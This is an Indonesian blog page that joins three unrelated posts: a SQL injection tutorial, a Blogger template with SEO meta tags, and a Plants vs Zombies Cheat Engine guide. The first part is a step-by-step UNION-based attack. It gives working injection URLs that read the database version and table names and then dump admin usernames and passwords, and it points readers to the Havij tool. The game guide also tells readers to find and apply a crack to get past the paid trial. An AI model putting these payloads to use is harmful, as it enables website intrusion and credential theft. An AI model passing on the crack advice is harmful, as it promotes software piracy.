Cara Hacking Website dengan teknik SQL Injection

Harap dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak” tidak akan ditanggapi.

Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.

Apa itu SQL injection ?

SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.

ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N

oke, mari kita simak bersama-sama.

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah

http://www.target.com/berita.php?id=100

2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.

Contoh :

http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by

Contoh :

http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…

Kalo “+” sebagai penghubung perintah…

6. Nah sampe sini langsung dah nyobain satu2…

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error…
Misalkan errornya disini…

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah “9″

http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :

http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)

8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…

Misalnya yang lo liat adalah table “admin”

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…

Contoh:

http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…

Contoh :

http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
—————————————————
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.

Download SQL injection step by step.DOC

oke selamat mencoba. yang terpenting jangan dilakukan di web teman anda ataupun di website Lokal.

referensi :

http://jasakom.com

http://ezine.echo.or.id

http://cruzenaldo.co.cc

http://students.ee.itb.ac.id

Catatan: Cara otomatis dengan memakai software bisa juga dilakukan, selengkapnya lihat artikel berikut ini

Atau mau mencoba tool yang baru saya dapatkan? namanya Havij. Adapun fitur2nya:

1. Supported Databases with injection methods:
• MsSQL 2000/2005 with error
• MsSQL 2000/2005 no error (union based)
• MySQL (union based)
• MySQL Blind
• MySQL error based
• Oracle (union based)
• MsAccess (union based)
2. Automatic database detection
3. Automatic type detection (string or integer)
4. Automatic keyword detection (finding difference between the positive and negative response)
5. Trying different injection syntaxes
6. Proxy support
7. Real time result
8. Options for replacing space by /**/,+,… against IDS or filters
9. Avoid using strings (magic_quotes similar filters bypass)
10. Bypassing illegal union
11. Full customizable http headers (like referer and user agent)
12. Load cookie from site for authentication
13. Guessing tables and columns in mysql<5 (also in blind) and MsAccess
14. Fast getting tables and columns for mysql
15. Multi thread Admin page finder
16. Multi thread Online MD5 cracker
17. Getting DBMS Informations
18. Getting tables, columns and data
19. Command executation (mssql only)
20. Reading system files (mysql only)
21. Insert/update/delete data

Download HAVIJ

White Hacker Template

Demo :  http://whitehackertemplate.blogspot.com 

Download :  Klik Disini

Model template yang saya kasih nama white hacker blogger template ini saya di disain dengan sangat SEO friendly, cepat load halaman, kompatibel dengan semua browser , awalnya disain itu sengaja saya buat khusus untuk blog hacker saya yang sudah setahun sejak dibuat masih terbengkalai sampai saat ini  (  makanya biar gampang saya namakan aja white hacker hehehe ) , maka saya putuskan untuk share aja templatenya biar ga mubazir diam aja , dan ternyata cukup lumayan peminatnya...

Struktur kode dalam Template blogger white hacker ini banyak yang saya pangkas abis, kode-kode yang gak perlu seperti quick edit dan beberapa link-link di home-page maupun post page saya buang juga , struktur H1,H2,H3 juga saya maksimalkan, dan juga sudah saya berikan susunan meta tags seo friendly...pokoke semaksimal yg saya mampu lah, karena niat awalnya emang mau buat perang SEO dengan para blog craker, hacker, lamer, spammer....er..errr.., tapi apa daya waktu dan tenaga belum ada.

Valid HTML ?
Silahkan cek disini validator.w3.org , bahwa google dan situs-situs besar lain juga memiliki banyak error.. , menurut pengalaman saya sedikit atau banyaknya error dalam sebuah struktur kode template sama sekali tidak berpengaruh dalam SEO , kalau meta tags dan struktur H1, H2, H3 memang berpengaruh menurut pengalaman saya pribadi .... , white hacker template itu berdasarkan tes dari blog demonya http://whitehackertemplate.blogspot.com ,berisi 21 Errors, 37 warning(s)  , tapi kalau mau mencoba sebuah blogger template yang kondisi kosongnya "nol error" bisa coba yang ini Simple white blogger template  , tapi jika blog telah diisi posting akan mucnul juga errornya, tapi gak parah...

Di blog hacker itu tadinya saya berencana mau berbagi berbagai koleksi software gratis yang saya punya, daripada saya simpan sendiri, tentu berbagai jensi software seputar hacking dan cracking, berikut tutorial terkait...eehh..sampai sekarang masih aja belum sempat, yang paling bikin males adalah ketika mau upload software..gimana nanti aja lah.

Keterangan Edit :

• kalian lihat dan edit sendiri sesuai kepribadian blog kalian., dan jangan lupa edit teks warna merah di kode berikut :

<b:if cond='data:blog.pageType == &quot;item&quot;'>
<title> <data:blog.pageName/> </title>
<b:else/>
<title> <data:blog.title/> </title>
</b:if>
<b:if cond='data:blog.url == data:blog.homepageUrl'>
<meta content='YOUR DESCRIPTION' name='description'/>
<meta content='KEYWORD1,KEYWORD2,KEYWORD3' name='keywords'/>
</b:if>
<meta content='global' name='target'/>
<meta content='Index,follow' name='Robots'/>
<meta content='ALL' name='SPIDERS'/>
<meta content='ALL' name='WEBCRAWLERS'/>
<meta content='general' name='rating'/>
<meta content='YOUR NAME' name='author'/>
<meta content='100' name='alexa'/>
<link expr:href='data:blog.url' rel='canonical'/>

• yang kedua edit menu navigasi, kalian tinggal ganti teks yang berwarna merah

<div id='nav'>
<ul class='nav'>
<li><a href='/'>Home</a></li>
<li><a href='#'>Menu1</a></li>
<li><a href='#'>Menu2</a></li>
<li><a href='#'>Menu3</a></li>
<li><a href='#'>Menu4</a></li>
<li><a href='#'>Menu5</a></li>
</ul>
</div> 

Keterangan navigasi :

• # >> Link yang dituju
• Menu1, 2, 3, 4, 5 >> Judul Menu Navigasi

Tutor Plants Vs Zombie Cheat With Cheat Engine + Download Link

All In One Cheat Plants Vs. Zombies (Infinite Sun,Money,No Refill and Tree Of Wisdom).Plants vs. Zombie adalah game bawaan dari Popcap yang tipe permainannya adalah mengandalkan strategi.Menurut saya sendiri,game ini memiliki tampilan yang unik dan bagus.Karena dalam game ini terdapat 2 karakter yaitu tanaman dan zombie (pokoknya seru,lucu dan pasti bikin ketagihan deh).Saya saja saking senangnya sampai-sampai dari pagi hingga dini hari main game itu.Dalam game ini,kita harus berusaha agar para zombie tidak bisa masuk kedalam rumah kita dan memakan otak kita (iiihh sereem..)dengan cara menanami tumbuh2an di pekarangan rumah kita.Inti dari permainan ini adalah mencegah para zombie untuk masuk ke rumah kita.Dan ini adalah Screenshoot nya:


Udahlah cuap-cuap nya dari pada kebablazan mending kita langsung aja yok belajar nge-Cheat Plants Vs. Zombie dengan menggunakan CHEAT ENGINE.

Sebelumnya perhatikanlah Hal-hal yang bisa di cheat di plants vs zombies :
- Infinite Sun = mataharinya nggak ada matinya
- No Delay/refill = tanpa delay/jeda waktu penggunaan tanaman
- Money = uang nggak abis-abis
- Tree Of The Wisdom - Pohon
Kali ini saya yang sedang baik hati dan tidak sombong (Jiahahaha)... (narsis), bakal bagi-bagi 4 cheat tersebut pada kalian semua.Bagi yang udah penasaran dari tadi cekkidot… langsung ke TKP :D

I. Cheat Infinite Sun Plants vs. Zombies

1. Download Game Plants vs Zombie di Popcap atau cari di google dengan keyword (Crack Plants vs Zombie) Kebanyakan game popcap berbayar maka dari itu carilah cara Hacking Popcap atau Cracknya.
2. Dowload Cheat Engine yang paling baru,soalnya lebih mantapzzz.Untuk sekarang Cheat Engine yang terbaru adalah Cheat Engine v.5.6
3. Kalau sudah di download,Install lah keduanya.
4. Buka plants vs. zombies, Pada saat main Plants vs Zombies ada waktu 60 menit atau trial maka dari itu harus kita crack supaya nggak Trial.
5. Crack Plants vs. Zombie dengan Crack yang sudah didownload tadi.
6. Jalankan Cheat Enginenya.
7. Setelah itu cobalah bermain dan lihat berapa duit atau matahari sobat, 50 kan ??
8. Sekarang pindah ke Cheat Engine lalu pertama open process list,pilih Plants vs Zombie.exe, Setelah itu masukan angka 50, Lalu Frist Scan. (Pokoknya berapapun matahari yang kamu punya itulah yang di scan).Jika sudah dapat angka nya, pindah ke game.
9. Setelah itu usahakan uang atau matahari berubah (terserah apa mau ditambah/dikurangi).
10. Balik lagi ke Cheat Engine,ketikkan berapa jumlah mataharimu sekarang,contoh 75,lalu next scan.
11. Jika sudah ketemu,ganti valuenya dengan angka yang sobat inginkan,missal 9999999.
12. Lalu freeze agar tidak berkurang-kurang mataharinya.
13. Selesai deh Cheat Plants Vs. Zombies dengan menggunakan Cheat Engine.
14. Silahkan maen gamenya sampai pagi.(heahahahha).. :D

II. Cheat No Delay/Refill Plants vs Zombies

1. Buka plants vs. zombies
2. Buka Cheat Engine nya juga.
3. Sekarang pindah ke Cheat Engine lalu pertama open process list, pilih Plants vs Zombie.exe
4. Klik “memory view” dibagian pojok kiri agak tengah deket per empatan belok kanan.
5. Cari kode JMP 007a80c4 atau kalau tidak ketemu coba cari kode yang depannya JMP juga.
6. Klik kanan lalu klik “Go to Address”
7. Ganti address nya menjadi 0048728C lalu Ok ,Yes
8. Klik ganda file yang tadi diubah, ganti add dword ptr [edi+24].01 menjadi add dword ptr [edi+24].200
9. Close memory view tsb,lalu maen sepuasnya.

III. Cheat Money Plants Vs. Zombies

1. Seperti biasa,Buka plants vs. zombies
2. Buka Cheat Engine nya juga.
3. Sekarang pindah ke Cheat Engine lalu pertama open process list, pilih Plants vs. Zombie.exe
4. Pindah ke game,lalu klik Shop.
5. Lihat berapa uang yang kamu punya.Pokoknya nggak boleh nol.
6. Pindah ke Cheat Engine lalu ketik berapa jumlah uang kamu lalu dibagi 10.Misal uang kamu 8500,ketik di cheat engine 850 lalu scan.
7. Jika sudah di scan dan ternyata yang ketemu Cuma sedikit,berarti anda termasuk orang2 yang beruntung (hehehe)… jika hasil yang ketemu banyak ampe ratusan bahkan ribuan,coba belanjakan uang yang kamu punya di Shop tsb.(Intinya kurangin jumlah uangmu).
8. Ketik jumlah uang mu sekarang lalu dibagi 10,lalu scan.
9. Jika sudah ketemu ganti value nya dengan berapa aja yang sobat inginkan.
10. Selesai deh… borong aja semua yang ada di shop tsb…(hehehe.)

IV. Cheat Tree Of Wisdom Plants vs. Zombies

Tujuan dari penanaman Tree Of Wisdom adalah supaya kita bisa mengaktifkan beberapa cheat yang nanti akan saya berikan setelah ini,jadi sabar ea…
nahhhhh…cara ninggiin Tree Of Wisdom itu yang sedikit merepotkan.Pupuknya seharga 2500,untuk bisa mengaktifkan cheat,Tree Of Wisdom harus mencapai ketinggian 100-1000ft.Maka dari itu kita harus meng-cheat ketinggian nya supaya bisa langsung 1000ft atau bahkan lebih,terserah sobat saja.
Cekkkkidot… langsung aja kita praktek Cheat Tree Of Wisdom Plants vs. Zombie.
1. Seperti biasa,Buka plants vs. zombies
2. Buka Cheat Engine nya juga.
3. Sekarang pindah ke Cheat Engine lalu pertama open process list,pilih Plants vs Zombie.exe
4. Pindah ke game,lalu klik Zen Garden,lalu pergi ke Tree Of Wisdom.
5. Klik Shop lalu beli pupuknya,nggak usah banyak2 beli diatas 3 aja.
6. Balik ke Tree Of Wisdom.
7. Bolak balik lagi ke Cheat Engine ketik 1 lalu scan.
8. Balik ke Tree Of Wisdom lalu pupuk 1x saja.
9. Balik lagi ke Cheat Engine ketik 2 lalu scan.
10. Balik ke Tree Of Wisdom lalu pupuk 1x lagi.
11. Balik lagi ke Cheat Engine ketik 3 lalu scan.
12. Jika sudah dapat angkanya,ganti value nya dengan berapa aja (basing/terserah).Angka itulah yang akan menjadi tinggi dari pohon itu.
13. Selesai deh.
kalau cara diatas tidak bisa,coba cara berikut:
Misal kamu punya Tree Of Wisdom setinggi 52ft,coba ketik 52 di cheat engine,lalu first scan,pindah ke game lalu tinggikan lagi pohonmu menjadi 53ft,balik ke cheat engine lalu ketik 53 dan next scan setelah dapat angkanya,ganti value nya terserah sobat.

Yang nggak ngerti dengan tutorial diatas bisa liat video nya langsung atau download video nya di youtube.com
Maaf kalo Agak Membingungkan,, Soalnya Ngetiknya buru buru,, Udah Malem...

DOWNLOAD PLANTS VS ZOMBIE FULL VERSION BY www.Remo-xp.com 

Password : www.remo-xp.com

SEMOGA BERMANFAAT

Jika anda malas Menggunakan cheat engine, silahkan gunakan TRAINER Dibawah

Dapat didownload dari sini

Trainer +7
http://games.softpedia.com/get/Cheat-Solutions/Plants-vs-Zombies-7-Trainer.shtml


Atau dari sini

Trainer ini fungsinya ada 4.
1. membuat jumlah SUN menjadi Infinity / tidak terhingga 999.999.....
2. membuat uang menjadi infinity
3. loading saat bermain game menjadi tidak ada. jadi langsung klik and klik
4. membuat zombie menjadi mati dengan 1 tembakan saja...

enak bukan....

caranya sangat mudah...
1. mainkan trainernya...
kemudian tekan F12 untuk mematikan musik dan tekanFf11 untuk meminimize
2. mainkan plant VS zombie.nya
3. tekan F1 untuk mebuat jumlah SUN menjadi infinity
F2 untuk membuat uang infinity
F3 untuk menghapus loading pada saat bermain game
F4 untuk membunuh zombie dengan sekali tembakan.
jika tidak bisa tekan F1,F2,F3 dan F4 berulang ulang hingga efeknya keluar... jika belum mengerti silahkan koment dibawah postingan ini....
thanks....

Download trainer plant vs zombie